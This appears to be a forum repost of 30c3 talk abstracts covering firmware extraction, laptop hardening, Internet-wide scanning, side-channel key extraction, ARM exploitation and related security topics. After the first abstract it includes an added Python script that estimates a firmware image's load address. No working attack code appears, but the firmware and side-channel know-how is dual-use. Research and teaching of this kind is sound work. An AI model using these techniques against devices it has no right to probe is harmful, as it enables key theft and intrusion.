The talk focuses on the different steps to be taken to acquire and analyze the firmware of an embedded device, especially without knowing anything about the processor architecture in use. Frequently datasheets are not available or do not name any details about the processor or System on Chip (SoC) used.

First the prerequisites, like knowledge about the device under investigation, the ability to read assembly language, and the tools of the trade for acquisition and analysis, are shown.

The question "How do I get the firmware out of device X?" forms the next big chapter: from easy to hard we pass through the different kinds of storage systems and locations a firmware can be stored in, the different ways the firmware gets transferred onto the device, and which tools we can use to retrieve the firmware from where it resides.

The next step is to analyze the gathered data. Is it compressed in any way? For which of the various processor architectures out there was it compiled? Once we have successfully figured out the CPU type and found a matching disassembler, where do we start to analyze the code? Often we have to find out the offset where the firmware is loaded to, to get an easy-to-analyze disassembler output. A technique to identify these offsets will be shown.

The last chapter covers the modifications we can apply to the firmware, and what types of checksum mechanisms are known to be used by the device or the firmware itself to check the integrity of the code.

Speaker: Stefan Widmann
EventID: 5477
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: English
Begin: Fri, 12/27/2013
License: CC-by
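Added example, not material from the talk: one common way to recover the load offset the abstract refers to is to correlate the absolute pointers found in a raw image with the file offsets of its strings and let them vote on a base address. The firmware image below is constructed inline; 32-bit little-endian words and a page-aligned base are assumptions of the example, not facts from the talk.

```python
"""Load-address recovery for a raw firmware image (added example): every
aligned 32-bit word is treated as a candidate pointer, every NUL-terminated
string as a candidate target, and the base = pointer - offset that the most
pairs agree on wins."""
import struct
from collections import Counter


def find_strings(image, min_len=4):
    """File offsets of NUL-terminated printable ASCII strings (>= min_len)."""
    offsets, start = [], None
    for i, b in enumerate(image):
        printable = 0x20 <= b < 0x7F
        if printable:
            if start is None:
                start = i
        else:
            if start is not None and b == 0 and i - start >= min_len:
                offsets.append(start)
            start = None
    return offsets


def candidate_pointers(image):
    """Every 4-byte-aligned little-endian word, read as a possible pointer."""
    return [struct.unpack_from("<I", image, off)[0]
            for off in range(0, len(image) - 3, 4)]


def guess_base(image, align=0x1000):
    """Vote over (word, string offset) pairs; only page-aligned bases count
    (a heuristic that removes most accidental matches). Returns (base, votes)
    or None when nothing lines up."""
    strings = find_strings(image)
    votes = Counter()
    for word in candidate_pointers(image):
        for s in strings:
            base = word - s
            if base >= 0 and base % align == 0:
                votes[base] += 1
    return votes.most_common(1)[0] if votes else None


def build_sample_image(base=0x08000000, size=0x800):
    """Constructed image: a few strings, a pointer table that references them
    by absolute address, and some unrelated words as noise."""
    img = bytearray(size)
    strings = [b"boot: ok", b"usb: enumerating", b"fault: hardfault", b"fw v1.2.3"]
    str_off, cur = [], 0x100
    for s in strings:
        img[cur:cur + len(s) + 1] = s + b"\x00"
        str_off.append(cur)
        cur = (cur + len(s) + 1 + 3) & ~3  # next string word-aligned
    for i, off in enumerate(str_off):  # pointer table at 0x400
        struct.pack_into("<I", img, 0x400 + 4 * i, base + off)
    for i, w in enumerate([0xDEADBEEF, 0x20001000, 0xE000ED00, 0x12345678]):
        struct.pack_into("<I", img, 0x500 + 4 * i, w)  # noise words
    return bytes(img)


if __name__ == "__main__":
    base, n = guess_base(build_sample_image())
    print(f"likely load address 0x{base:08x} ({n} pointer/string matches)")
```

On a real image the vote for the true base is far from unanimous, so compare the top few candidates and confirm by disassembling around a pointer target.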
  15. [h=1]Hardening hardware and choosing a #goodBIOS [30c3][/h]

Hardening hardware and choosing a #goodBIOS

Clean boot every boot - rejecting persistence of malicious software and tripping up the evil maid

A commodity laptop is analyzed to identify exposed attack surfaces and is then secured on both the hardware and the firmware level against permanent modifications by malicious software as well as quick drive-by hardware attacks by evil maids, ensuring that the machine always powers up to a known good state and significantly raising the bar for an attacker who wants to use the machine against its owner.

Commodity computers by design include attack vectors that allow malicious software and attackers who gain brief physical access, so-called evil maids, to take full control over the machine without the owner ever noticing. The presentation briefly enumerates well-known attacks such as remote DMA over IEEE 1394/FireWire, BIOS bootkits, AMT and closed source operating system updates to arrive at a problem statement, and moves on in search of solutions which can block the attacks completely or at least hinder them from becoming persistent, starting a layer below them all: with the schematic of a laptop mainboard.

A few relatively simple hardware modifications are identified, which together with the coreboot #goodBIOS firmware prevent two entire classes of attacks. The result is a machine which always powers up in a known good state and which must be under attacker control for 20 minutes in order to be compromised, rather than just 20 seconds.

In closing the presentation starts a discussion about what we can do to address this problem, which exists in every single computer on the market, on a larger scale.

Speaker: Peter Stuge
EventID: 5529
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: English
Begin: Fri, 12/27/2013
License: CC-by
  16. [h=1]Fast Internet-wide Scanning and its Security Applications [30c3][/h]

Fast Internet-wide Scanning and its Security Applications

Internet-wide network scanning has powerful security applications, including exposing new vulnerabilities, tracking their mitigation, and exposing hidden services. Unfortunately, probing the entire public address space with standard tools like Nmap requires either months of time or large clusters of machines. In this talk, I'll demonstrate ZMap, an open-source network scanner developed by my research group that is designed from the ground up to perform Internet-wide scans efficiently. We've used ZMap with a gigabit Ethernet uplink to survey the entire IPv4 address space in under 45 minutes from a single machine, more than 1300 times faster than Nmap. I'll explain how ZMap's architecture enables such high performance. We'll then work through a series of practical examples that explore the security applications of very fast Internet-scale scanning, both offensive and defensive. I'll talk about results and experiences from conducting more than 300 Internet-wide scans over the past 18 months, including new revelations about the state of the HTTPS CA ecosystem. I'll discuss the reactions our scans have generated (on one occasion we were mistaken for an Iranian attack against U.S. banks and received a visit from the FBI), and I'll suggest guidelines and best practices for good Internet citizenship while scanning.

Internet-scale network surveys collect data by probing large subsets of the public IP address space. While such scanning behavior is often associated with botnets and worms, it has also proved to be a powerful methodology for security research. Recent studies, beginning with the EFF's SSL Observatory, have demonstrated that Internet-wide scanning can help reveal new kinds of vulnerabilities, monitor deployment of mitigations, and shed light on previously opaque distributed ecosystems. Unfortunately, this methodology has been more accessible to attackers than to researchers without access to botnets or the willingness to spread self-replicating code. Comprehensively scanning the public address space with off-the-shelf tools like Nmap requires weeks of time or many machines.

To make Internet-wide scanning more accessible, my research team recently introduced ZMap, an open-source network scanner that is designed from the ground up to perform Internet-scale port scans. In our tests using a gigabit Ethernet uplink, ZMap scans the entire IPv4 address space in under 45 minutes from a single machine, more than 1300 times faster than Nmap. By the time of the talk, we'll have switched to a 10 GigE uplink, which should theoretically support scanning the entire address space in under 5 minutes. I'll explain how ZMap's architecture enables such high performance by taking advantage of fast modern hardware and recent improvements to the Linux kernel.

We'll work through a series of practical examples that explore the security applications of very fast Internet-scale scanning, both offensive and defensive, and I'll share experiences from conducting more than 300 Internet-wide scans over the past 18 months, totaling well over 1 trillion probes. I'll describe how we completed hundreds of scans targeting every public HTTPS server (each scan larger than the entire SSL Observatory) in order to shed light on the growth of HTTPS deployments and expose security problems within the HTTPS ecosystem, such as misissued CA certs and widespread server misconfiguration. I'll show how high-speed scanning can be used to expose vulnerable hosts, using IPMI and UPnP vulnerabilities as recent examples. Malicious attackers could abuse this capability to exploit 0day vulnerabilities affecting millions of hosts within hours of a problem's discovery, and better defenses are badly needed. Finally, I'll discuss applications to Internet freedom, including discovering unadvertised services such as hidden Tor bridges (used for censorship resistance) and Bluecoat devices (used for state-sponsored censorship).

High-speed scanning can be a powerful tool in the hands of security researchers, but users must be careful not to cause harm by inadvertently overloading networks or causing unnecessary work for network administrators. I'll discuss the complaints and other reactions my group's scanning has generated (on one occasion we were mistaken for an Iranian DoS attack on U.S. banks, and we received a visit from the FBI), and I'll suggest several guidelines and best practices for good Internet citizenship while scanning.

Speaker: J. Alex Halderman
EventID: 5533
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: English
Begin: Sat, 12/28/2013
License: CC-by
  17. [h=1]Bug class genocide [30c3][/h]

Bug class genocide

Applying science to eliminate 100% of buffer overflows

Violation of memory safety is still a major source of vulnerabilities in everyday systems. This talk presents the state of the art in compiler instrumentation to completely eliminate such vulnerabilities in C/C++ software.

The hacker community has a lot of words for situations in which access to the wrong part of memory leads to an exploitable vulnerability: buffer overflow, integer overflows, stack smashing, heap overflow, use-after-free, double free and so on. Different words are used because the techniques to trigger the faulty memory access and to subsequently use that to gain code execution vary, but they all share a common root cause: violation of spatial and temporal memory safety.

If one looks at the C/C++ standard, the situations that tend to be exploitable are "unspecified". Usually, compiler writers take that as an excuse to cut corners, to gain that extra bit of performance in the benchmarks. Because, you know, who cares you're exploitable when you make a mistake, look how fast it is!

However, the standards also allow the compiler to introduce safety checks, to see whether access to a pointer actually touches the inside of an allocated object instead of the outside (spatial memory safety), and to make sure that the pointer being accessed actually points to an object that has been allocated, but not yet been freed again (temporal memory safety). Such compilers do exist, in the form of LLVM with specialized optimizer passes that introduce runtime safety checks.

This talk will look into the details of the implementation, the performance impact, practical handling, and of course, whether it really delivers the promised 100% protection against buffer overflows.

Speaker: Andreas Bogk
EventID: 5412
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: English
Begin: Fri, 12/27/2013
License: CC-by
  18. [h=1]How to Build a Mind - Artificial Intelligence Reloaded [30c3][/h]

How to Build a Mind

Artificial Intelligence Reloaded

A foray into the present, future and ideas of Artificial Intelligence. Are we going to build (beyond) human-level artificial intelligence one day? Very likely. When? Nobody knows, because the specs are not fully done yet. But let me give you some of those we already know, just to get you started.

While large factions within the philosophy of mind still seem to struggle over the relationship between mind, world, meaning, intentionality, subjectivity, phenomenal experience, personhood and autonomy, Artificial Intelligence (AI) offers a clear and concise set of answers to these basic questions, as well as avenues of pursuing their eventual understanding. In the view of AI, minds are computational machines, whereby computationalism is best understood as the most contemporary version of the mechanist world view. In the lecture, I will briefly address some of the basic ideas that will underlie a unified computational model of the mind, and especially focus on a computational understanding of motivation and autonomy, representation and grounding, associative thinking, reason and creativity.

Speaker: Joscha
EventID: 5526
Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC]
Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany
Language: English
Begin: Sun, 12/29/2013
License: CC-by
  19. [h=1]FPGA 101 - Making awesome stuff with FPGAs [30c3][/h]
FPGA 101: Making awesome stuff with FPGAs

In this talk I want to show you around in the mysterious world of Field Programmable Gate Arrays, or FPGAs for short. The aim is to enable you to get a rough understanding of what FPGAs are good at and how they can be used in areas where conventional CPUs and microcontrollers are failing us. FPGAs open up the world of high-speed serial interconnects, nano-second event reactions and hardware fuzzing.

In this lecture I will present you the basics of how FPGAs work and how to program them. I will also showcase some tasks where FPGAs really shine. As an example I will show how a 200 MHz FPGA can perform a discrete wavelet twice as fast as a 2.6 GHz i7. I will also show other applications where FPGAs are almost unbeatable, compared to a CPU. At the end I will give you an overview of the market: what are hacker-friendly boards, which vendor's tool chain sucks the least, etc. After this lecture you should be able to decide whether a CPU, a GPU or an FPGA could solve your problem most efficiently.

Speaker: Karsten Becker EventID: 5185 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 License: CC-by
  20. [h=1]Reverse engineering the Wii U Gamepad [30c3][/h]
Reverse engineering the Wii U Gamepad

A year ago in November 2012, Nintendo released their latest home video game console: the Wii U. While most video game consoles use controllers that are very basic, the Wii U took the opposite route with a very featureful gamepad: wireless with a fairly high range, touch screen, speakers, accelerometer, video camera, and even NFC are supported by the Wii U gamepad. However, as of today, this interesting piece of hardware can only be used in conjunction with a Wii U: wireless communications are encrypted and obfuscated, and there is no documentation about the protocols used for data exchange between the console and its controller. Around December 2012, I started working with two other hackers in order to reverse engineer, document and implement the Wii U gamepad communication protocols on a PC. This talk will present our findings and show the current state of our reverse engineering efforts.

When the Wii U was released, a few console hackers and I were talking about potential uses for the Wii U gamepad. However, before being able to use a Wii U gamepad as a remote controller for a robot or a quadricopter, the first step was to understand how it worked and how to communicate with it. This started our long journey of soldering wires on Flash chips, reading the h.264 specification and complaining about the lack of features in most Wi-Fi drivers and devices (on all platforms, Linux and ath9k devices being the least horrible). While some "journalists" reported that the Wii U gamepad is using the Miracast™ technology, a Wi-Fi standard, it turned out that this was never the case. Instead, Nintendo decided to reinvent four different protocols (video streaming, audio streaming, input streaming as well as a light request-reply RPC protocol), and embed them in a slightly obfuscated version of WPA2, sent over the air using 5GHz Wi-Fi 802.11n.

A small ARM CPU is embedded in the Wii U Gamepad (codenamed DRC) and runs a realtime operating system to handle network communication. In the Wii U, another ARM CPU (codenamed DRH) does the same thing. In this presentation, we will go into the details of how we went from a 32MB binary blob to a proof of concept of Wii U gamepad "emulation" on a PC, including full documentation of the wireless communications obfuscation layer and partial documentation of the four data exchange protocols used on the gamepad.

Speaker: delroth shuffle2 EventID: 5322 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 License: CC-by
  21. [h=1]Backdoors, Government Hacking and The Next Crypto Wars [30c3][/h]
Backdoors, Government Hacking and The Next Crypto Wars

Law enforcement agencies claim they are "going dark". Encryption technologies have finally been deployed by software companies, and critically, enabled by default, such that emails are flowing over HTTPS, and disk encryption is now frequently used. Friendly telcos, who were once a one-stop-shop for surveillance, can no longer meet the needs of our government. What are the FBI and other law enforcement agencies doing to preserve their spying capabilities?

The FBI is rallying political support in Washington, DC for legislation that will give it the ability to fine Internet companies unwilling to build surveillance backdoors into their products. Even without such legislation, the US government has started to wage war against companies that offer secure communications services to their users. As the FBI's top lawyer said in 2010, "[Companies] can promise strong encryption. They just need to figure out how they can provide us plain text."

At the same time, law enforcement agencies in the United States and elsewhere are acquiring the tools to hack into the computers of their own citizens. The FBI has purchased custom-built software, while other law enforcement agencies in the US and elsewhere use off-the-shelf spyware from companies like Gamma and Hacking Team. Regardless of the software they use, the capabilities are generally similar: They can enable a computer's webcam and microphone; collect real-time location data; and copy emails, web browsing records, and other documents.

Speaker: Christopher Soghoian EventID: 5478 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 License: CC-by
  22. [h=1]The Tor Network [30c3] (with Jacob Appelbaum)[/h]
The Tor Network: We're living in interesting times

Roger Dingledine and Jacob Appelbaum will discuss contemporary Tor Network issues related to censorship, security, privacy and anonymity online. The last several years have included major cryptographic upgrades in the Tor network, interesting academic papers in attacking the Tor network, major high profile users breaking news about the network itself, discussions about funding, FBI/NSA exploitation of Tor Browser users, botnet related load on the Tor network and other important topics. This talk will clarify many important topics for the Tor community and for the world at large.

Speaker: Jacob arma EventID: 5423 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 License: CC-by
  23. [h=1]Extracting keys from FPGAs, OTP Tokens and Door Locks [30c3][/h]
Extracting keys from FPGAs, OTP Tokens and Door Locks: Side-Channel (and other) Attacks in Practice

Side-channel analysis (SCA) and related methods exploit physical characteristics of a (cryptographic) implementation to bypass security mechanisms and extract secret keys. Yet, SCA is often considered a purely academic exercise with no impact on real systems. In this talk, we show that this is not the case: Using the example of several wide-spread real-world devices, we demonstrate that even seemingly secure systems can be attacked by means of SCA with limited effort.

This talk briefly introduces implementation attacks and side-channel analysis (SCA) in particular. Typical side-channels like the power consumption and the EM emanation are introduced. The main focus is then on three case studies that have been conducted as part of the SCA research of the Chair for Embedded Security (Ruhr-Uni Bochum) since 2008: The first example is FPGAs that can be protected against reverse-engineering and product counterfeiting with a feature called "bitstream encryption". Although the major vendors (Xilinx and Altera) use secure ciphers like AES, no countermeasures against SCA were implemented. As a second example, a wide-spread electronic locking system based on proprietary cryptography is analyzed. The target of the third case study is a popular one-time password token for two-factor authentication, the Yubikey 2. In all three cases, the cryptographic secrets could be recovered within a few minutes to a few hours of measurements, allowing an adversary to decrypt FPGA bitstreams, to clone Yubikeys, and to open all locks in an entire installation, respectively. In conclusion, we summarize possible countermeasures against the presented attacks and describe the communication with the respective vendors as part of a responsible disclosure process.

Speaker: David EventID: 5417 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 License: CC-by
  24. [h=1]The philosophy of hacking [30c3][/h]
The philosophy of hacking: Contemplations on the essence of hacking and its implications on hacker ethics

Modern society's use of technology as an instrument for domination is deeply problematic. Are instrumentality and domination inherent to the essence of technology? Can hacking provide an alternative approach to technology which can overcome this? How do art and beauty fit into this approach?

In order to understand the essence of hacking, it is important to first critically examine the essence of (modern) technology and the rationalization of technological development. Because for all the wonderful things technology has given us, it has also brought us a vast array of instruments for domination, ranging from nuclear warheads to the panoptic surveillance state. As a community that is so deeply involved with technology, it is imperative for us to comprehend that these developments did not come out of thin air and that we have the choice to follow a different path. Understanding Heidegger's notion of enframing as the product of historical rationalization gives us an insight into the relation between the objective, scientific approach to technology and its instrumentalization as a means for domination. Yet it also highlights the subversive potential of hacker cultures. The hackers' playful curiosity and desire to express creativity within the computer-imposed frameworks of formal logic has the potential to transcend code into poetry, reconnecting techne with poiesis and mapping the road towards the revealing nature of technology. Hacking has the potential to elevate abstract technological mechanisms and relations dissociated from the individuality to the plane of the utmost concrete and subjective images.

As the creative output of the hacker both adheres to the formal methods of Boolean logic and at the same time challenges them by devoiding them of their rational finalities, the positivist rationale of what we hold to be most objective can be turned into an expression of the subject. I will argue that this repositioning of the subject provides the basis for transforming the technological rationale into one that is aimed at liberation.

Speaker: groente EventID: 5278 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Mon, 12/30/2013 License: CC-by
  25. [h=1]Hardware Attacks, Advanced ARM Exploitation, and Android Hacking[/h]
Hardware Attacks, Advanced ARM Exploitation, and Android Hacking

In this talk (which in part was delivered at Infiltrate 2013 and NoSuchCon 2013) we will discuss our recent research that is being rolled into our Practical ARM Exploitation course (sold out at Blackhat this year and last) on Linux and Android (for embedded applications and mobile devices). We will also demonstrate these techniques and discuss how we were able to discover them using several ARM hardware development platforms that we custom built. Where relevant we will also discuss ARM exploitation as it relates to Android, as we wrote about in the "Android Hacker's Handbook" which we co-authored and will be released in October 2013.

Lastly, we will also discuss some of our most recent related hardware research (to facilitate the above) which will include bus protocol eavesdropping/reverse engineering, demystifying hardware debugging, and surreptitiously obtaining embedded software (firmware) using hardware techniques. We will demonstrate and show the supportive tools used and techniques developed to perform this work and deploy them against Apple MFI iAP devices, and multimedia devices using OEM implemented USB stacks. (Which will briefly include our experiences around starting int3.cc - Tools for the Talented where we sell a fully assembled modified version of a hardware USB fuzzer.) Along the way we will inevitably share some of the lessons we also learned while completely designing the hardware (from scratch), writing the firmware, and mobile apps for an embedded security device called Osprey that we hold the patent for and have been public about as a hardware vulnerability assessment swiss-army-knife for researchers.

Speaker: Stephen A. Ridley EventID: 5193 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: 12/28/2013 License: CC-by